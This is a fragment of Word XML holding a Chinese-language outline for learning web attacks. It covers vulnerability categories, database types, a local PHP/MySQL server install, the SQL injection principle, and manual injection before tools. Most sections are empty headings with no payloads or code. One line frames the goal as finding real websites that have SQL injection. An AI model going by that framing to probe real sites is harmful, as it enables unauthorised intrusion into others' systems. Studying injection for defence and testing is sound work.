    <w:p w:rsidR="005612B7" w:rsidRPr="00D92145" w:rsidRDefault="0073089F" w:rsidP="005612B7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_0Day漏洞" w:history="1">
        <w:r w:rsidR="005612B7" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>0Day漏洞</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005612B7" w:rsidRPr="005612B7" w:rsidRDefault="005612B7" w:rsidP="005612B7"/>
    <w:p w:rsidR="001863B7" w:rsidRDefault="001863B7" w:rsidP="001863B7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc489789693"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="001863B7" w:rsidRDefault="00B11C70" w:rsidP="001863B7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器服务软件漏洞（IIS,Apache等等）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4DEE" w:rsidRDefault="002B4DEE" w:rsidP="002B4DEE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linxu | Windows 系统漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F3F2D" w:rsidRDefault="0073089F" w:rsidP="001F3F2D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_暴力破解" w:history="1">
        <w:r w:rsidR="00830563" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>弱口令</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00184A44" w:rsidRPr="00184A44" w:rsidRDefault="00184A44" w:rsidP="00184A44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78B" w:rsidTr="0009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4578B" w:rsidRPr="0074578B" w:rsidRDefault="0074578B" w:rsidP="0074578B">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A6AA7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>以下</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>目录</w:t>
            </w:r>
            <w:r w:rsidRPr="001A6AA7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>都是例子，不是只学这个，例如：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A6AA7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>PHP+My</w:t>
            </w:r>
            <w:r w:rsidRPr="001A6AA7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="001A6AA7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>构造注入，不是</w:t>
            </w:r>
            <w:r w:rsidRPr="001A6AA7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>只学这个，只是</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>比较容易，故此</w:t>
            </w:r>
            <w:r w:rsidRPr="001A6AA7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>从这个点引入。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0006117E" w:rsidRPr="006659C4" w:rsidRDefault="0006117E" w:rsidP="006659C4">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0006117E" w:rsidRPr="0006117E" w:rsidRDefault="008F1A14" w:rsidP="0006117E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_SQL"/>
      <w:bookmarkStart w:id="8" w:name="_Toc489789694"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00C63A79" w:rsidRDefault="00635B27" w:rsidP="00C63A79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc489789695"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00343292" w:rsidRDefault="00343292" w:rsidP="007960FC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9E78EF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结构化查询语言（</w:t>
      </w:r>
      <w:r w:rsidRPr="009E78EF">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>英语：Structured Query Language</w:t>
      </w:r>
      <w:r w:rsidRPr="009E78EF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，缩写：SQL），是一种特殊目的之编程语言，用于数据库中的标准数据查询语言</w:t>
      </w:r>
      <w:r w:rsidR="000D2176"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。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00842633" w:rsidRDefault="00842633" w:rsidP="007E605C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基本语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00631DEC" w:rsidRPr="00631DEC" w:rsidRDefault="00631DEC" w:rsidP="00631DEC">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:ind w:left="1620"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00842633" w:rsidRPr="009E78EF" w:rsidRDefault="00842633" w:rsidP="007960FC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</w:p>
    <w:p w:rsidR="00476736" w:rsidRDefault="003B51CA" w:rsidP="00720558">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc489789696"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库分类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00EF305C" w:rsidRDefault="00EF305C" w:rsidP="00EF305C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0E23" w:rsidRDefault="00BB0E23" w:rsidP="00DE2489">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0E23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>安装流程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D34091" w:rsidRPr="00D34091" w:rsidRDefault="00D34091" w:rsidP="00D34091">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开这个软件（以这个软件为例子，其他也可，就是一个开启</w:t>
      </w:r>
      <w:r w:rsidR="006D575E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的一个集合软件）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC1D53" w:rsidRDefault="00122CB1" w:rsidP="00376506">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E3451EE" wp14:editId="5B8D2BBC">
            <wp:extent cx="1904762" cy="1400000"/>
            <wp:effectExtent l="152400" t="152400" r="362585" b="3530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4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6506" w:rsidRDefault="00376506" w:rsidP="00376506">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00376506" w:rsidRPr="00376506" w:rsidRDefault="00376506" w:rsidP="00376506">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E729C97" wp14:editId="0DEE427F">
            <wp:extent cx="5274310" cy="3843655"/>
            <wp:effectExtent l="152400" t="152400" r="364490" b="3663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091" w:rsidRDefault="004B0819" w:rsidP="004B0819">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:ind w:left="1620"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>选择安装的目录</w:t>
      </w:r>
      <w:r w:rsidR="00F03470">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>，点击</w:t>
      </w:r>
      <w:r w:rsidR="00F03470">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B0819" w:rsidRDefault="004B0819" w:rsidP="004B0819">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69F73FDE" wp14:editId="4D5A1CE9">
            <wp:extent cx="4790476" cy="3676190"/>
            <wp:effectExtent l="152400" t="152400" r="353060" b="3625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478" w:rsidRDefault="00F60478" w:rsidP="00F60478">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一直点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F60478" w:rsidRDefault="00F60478" w:rsidP="00F60478">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F11704" w:rsidRDefault="00F11704" w:rsidP="00F11704">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F05A2D0" wp14:editId="5DA8C588">
            <wp:extent cx="4780952" cy="3723809"/>
            <wp:effectExtent l="152400" t="152400" r="362585" b="3530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72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02AD" w:rsidRDefault="00306303" w:rsidP="00AE02AD">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装完毕打开软件即可</w:t>
      </w:r>
      <w:r w:rsidR="008F2226">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（必须是白色的才可用）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00306303" w:rsidRPr="00306303" w:rsidRDefault="00E779A6" w:rsidP="00E779A6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F028987" wp14:editId="62916A50">
            <wp:extent cx="552381" cy="390476"/>
            <wp:effectExtent l="152400" t="152400" r="362585" b="3530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39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E23" w:rsidRPr="00BB0E23" w:rsidRDefault="00BB0E23" w:rsidP="00BB0E23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</w:p>
    <w:p w:rsidR="00954CC8" w:rsidRDefault="00954CC8" w:rsidP="00954CC8">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>基本语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA611A" w:rsidRPr="00CA611A" w:rsidRDefault="00CA611A" w:rsidP="00B95C3B">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF305C" w:rsidRDefault="00EF305C" w:rsidP="00EF305C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRPr="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF305C" w:rsidRDefault="00EF305C" w:rsidP="00EF305C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SqlServer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRPr="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002616C0" w:rsidRDefault="002616C0" w:rsidP="002616C0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRPr="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002616C0" w:rsidRDefault="002616C0" w:rsidP="002616C0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DB2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRPr="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00031287" w:rsidRDefault="00031287" w:rsidP="001D07C6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="001D07C6">
        <w:t>PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3F4F" w:rsidRDefault="002A3F4F" w:rsidP="002A3F4F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>基本语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E37CDA" w:rsidRPr="00E37CDA" w:rsidRDefault="002A3F4F" w:rsidP="001F20E4">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35A9B" w:rsidRDefault="00391762" w:rsidP="00B35A9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc489789697"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00716EA6" w:rsidRPr="009E78EF" w:rsidRDefault="00716EA6" w:rsidP="00716EA6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客户端向服务端发送的请求数据可以影响到服务器的数据库，为SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011769A" w:rsidRPr="00DA02C7" w:rsidRDefault="00720558" w:rsidP="0011769A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc489789698"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="0011769A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="0011769A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP+Mysql</w:t>
      </w:r>
      <w:r w:rsidR="0011769A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="002948B6" w:rsidRPr="009E78EF" w:rsidRDefault="002948B6" w:rsidP="002948B6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学习服务器后端语言</w:t>
      </w:r>
      <w:r w:rsidR="00A217EE"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,有PHP,ASP</w:t>
      </w:r>
      <w:r w:rsidR="00A217EE" w:rsidRPr="009E78EF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,JSP,Python</w:t>
      </w:r>
      <w:r w:rsidR="00A217EE"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等等，不要害怕，只学习相关漏洞的代码知识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002948B6" w:rsidRDefault="002948B6" w:rsidP="002948B6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习P</w:t>
      </w:r>
      <w:r>
        <w:t>HP</w:t>
      </w:r>
      <w:r w:rsidR="000813BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002948B6" w:rsidRDefault="002948B6" w:rsidP="002948B6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习A</w:t>
      </w:r>
      <w:r>
        <w:t>SP</w:t>
      </w:r>
      <w:r w:rsidR="000813BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000813BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002948B6" w:rsidRDefault="002948B6" w:rsidP="002948B6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习J</w:t>
      </w:r>
      <w:r>
        <w:t>SP</w:t>
      </w:r>
      <w:r w:rsidR="000813BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000813BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接数据库 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00B69" w:rsidRDefault="00B00B69" w:rsidP="00B00B69">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习Python</w:t>
      </w:r>
      <w:r w:rsidR="000813BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000813BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001230D6" w:rsidRPr="001230D6" w:rsidRDefault="001230D6" w:rsidP="001230D6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举例用PHP+Mysql构造SQL注入漏洞（其他语言数据库都大同小异）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002948B6" w:rsidRPr="002948B6" w:rsidRDefault="002948B6" w:rsidP="002948B6"/>
    <w:p w:rsidR="007B3A85" w:rsidRDefault="00F43EA2" w:rsidP="007B3A85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc489789699"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何查找</w:t>
      </w:r>
      <w:r w:rsidR="007B3A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此类漏洞（</w:t>
      </w:r>
      <w:r w:rsidR="007B3A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="002024B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="007B3A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00526BC3" w:rsidRPr="009E78EF" w:rsidRDefault="00F036F2" w:rsidP="003362CC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这个是关键，因为即使你知道SQL注入原理，但找不到存在SQL注入的网站，也是白搭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0048" w:rsidRDefault="00391070" w:rsidP="00AA0048">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc489789700"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手工构造注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="007D30F7" w:rsidRPr="009E78EF" w:rsidRDefault="007D30F7" w:rsidP="00B14E5D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lastRenderedPageBreak/>
        <w:t>先学习手工构造注入，再学习工具使用，因为只有会了手工注入，才能举一反三，工具只是加快速度而已。</w:t>
      </w:r>
    </w:p>
